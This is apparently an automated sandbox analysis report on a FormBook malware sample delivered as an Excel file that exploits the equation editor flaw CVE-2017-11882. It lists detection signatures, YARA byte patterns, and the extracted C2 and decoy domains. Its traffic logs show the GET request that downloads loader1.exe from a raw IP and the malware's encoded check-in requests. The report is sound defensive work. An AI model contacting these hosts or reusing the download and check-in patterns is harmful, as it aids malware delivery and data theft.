Loading ...

Play interactive tourEdit tour

Windows Analysis Report Swift-Payment_Details.xlsx

Overview

General Information

Sample Name:Swift-Payment_Details.xlsx
Analysis ID:452647
MD5:975a4017075c97740e54740fc8d24f77
SHA1:0a483229a6fa9a61575bcdd3068a5707d17034c5
SHA256:01d8b4b3103b1ecee2ced7a9437bc2c512918199ed9238040b775ee7196e8ede
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2480 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2392 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3016 cmdline: 'C:\Users\Public\vbc.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
      • vbc.exe (PID: 2300 cmdline: 'C:\Users\Public\vbc.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
        • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wscript.exe (PID: 1796 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 979D74799EA6C8B8167869A68DF5204A)
            • cmd.exe (PID: 2656 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.vbc.exe.270000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.vbc.exe.270000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.vbc.exe.270000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        7.1.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.1.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.210.173.40, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2392, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2392, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2392, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3016
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2392, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3016

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Swift-Payment_Details.xlsxReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: 9.2.wscript.exe.2ac7960.7.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 9.2.wscript.exe.642310.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.vbc.exe.230000.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.vbc.exe.270000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wscript.exe
          Source: Binary string: wscript.pdb source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp
          Source: Binary string: wscript.pdbN source: vbc.exe, 00000007.00000002.2202709093.0000000000589000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: www.anthonysavillemiddleschool.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80
          Source: excel.exeMemory has grown: Private usage: 4MB later: 71MB

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 192.210.173.40:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 173.255.194.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 173.255.194.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 173.255.194.134:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extinctionbrews.com/dy8g/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 15:23:19 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 22 Jul 2021 14:21:45 GMTETag: "2e1d9-5c7b701c11d26"Accept-Ranges: bytesContent-Length: 188889Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c 05 02 7b 28 64 6c 28 28 64 6c 28 28 64 6c 28 c0 7b 67 28 29 64 6c 28 ab 78 62 28 20 64 6c 28 c0 7b 66 28 3f 64 6c 28 21 1c ff 28 23 64 6c 28 28 64 6d 28 16 64 6c 28 21 1c ef 28 29 64 6c 28 21 1c fd 28 29 64 6c 28 52 69 63 68 28 64 6c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f0 7e f9 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 00 00 00 12 00 00 00 00 00 00 5a 20 00 00 00 10 00 00 00 50 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 54 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 34 00 00 00 10 00 00 00 36 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 09 00 00 00 50 00 00 00 0a 00 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 06 00 00 00 60 00 00 00 04 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=rwgJraFzZp/V2q8u2Shj6R3C57WQypzH7HaIjADLKjfnthexEKyoQAtUw623G0BOv3Gwbg== HTTP/1.1Host: www.anthonysavillemiddleschool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL HTTP/1.1Host: www.envisionfordheights.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=qBaU/+yaefHhIJkiEPofXU4iidVfFInHYvzb5F8Pi5TSlEQo4YuA2EgGVMsttPV3rTFjAQ== HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?f6AxB=DyFQJ288GFHSDaRVmYvFextRb5KpVMjfJi9S0KMeos3/VwrcWYQUkgom+EPLcL1jkg9ePA==&m4=JhkpqhXpG6AL HTTP/1.1Host: www.scuolatua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=DD+fNAxrYhECY6o7Z2Ot8DQee/pwekPiIII0s/Xm/SYWktVPhnSE8TJmgfkAm9V0KaSOdQ== HTTP/1.1Host: www.theshapecreator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.210.173.40 192.210.173.40
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
          Source: global trafficHTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2ACE7B2.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=rwgJraFzZp/V2q8u2Shj6R3C57WQypzH7HaIjADLKjfnthexEKyoQAtUw623G0BOv3Gwbg== HTTP/1.1Host: www.anthonysavillemiddleschool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?f6AxB=vVE1EPQ0UVj9kOe8VQ0nVcRzGfWXkz9RjMJXc7yWSGpHU8pWW617eZYhUx3ojEq6OYTq+w==&m4=JhkpqhXpG6AL HTTP/1.1Host: www.envisionfordheights.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=qBaU/+yaefHhIJkiEPofXU4iidVfFInHYvzb5F8Pi5TSlEQo4YuA2EgGVMsttPV3rTFjAQ== HTTP/1.1Host: www.melodezu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?f6AxB=DyFQJ288GFHSDaRVmYvFextRb5KpVMjfJi9S0KMeos3/VwrcWYQUkgom+EPLcL1jkg9ePA==&m4=JhkpqhXpG6AL HTTP/1.1Host: www.scuolatua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?m4=JhkpqhXpG6AL&f6AxB=DD+fNAxrYhECY6o7Z2Ot8DQee/pwekPiIII0s/Xm/SYWktVPhnSE8TJmgfkAm9V0KaSOdQ== HTTP/1.1Host: www.theshapecreator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.anthonysavillemiddleschool.com
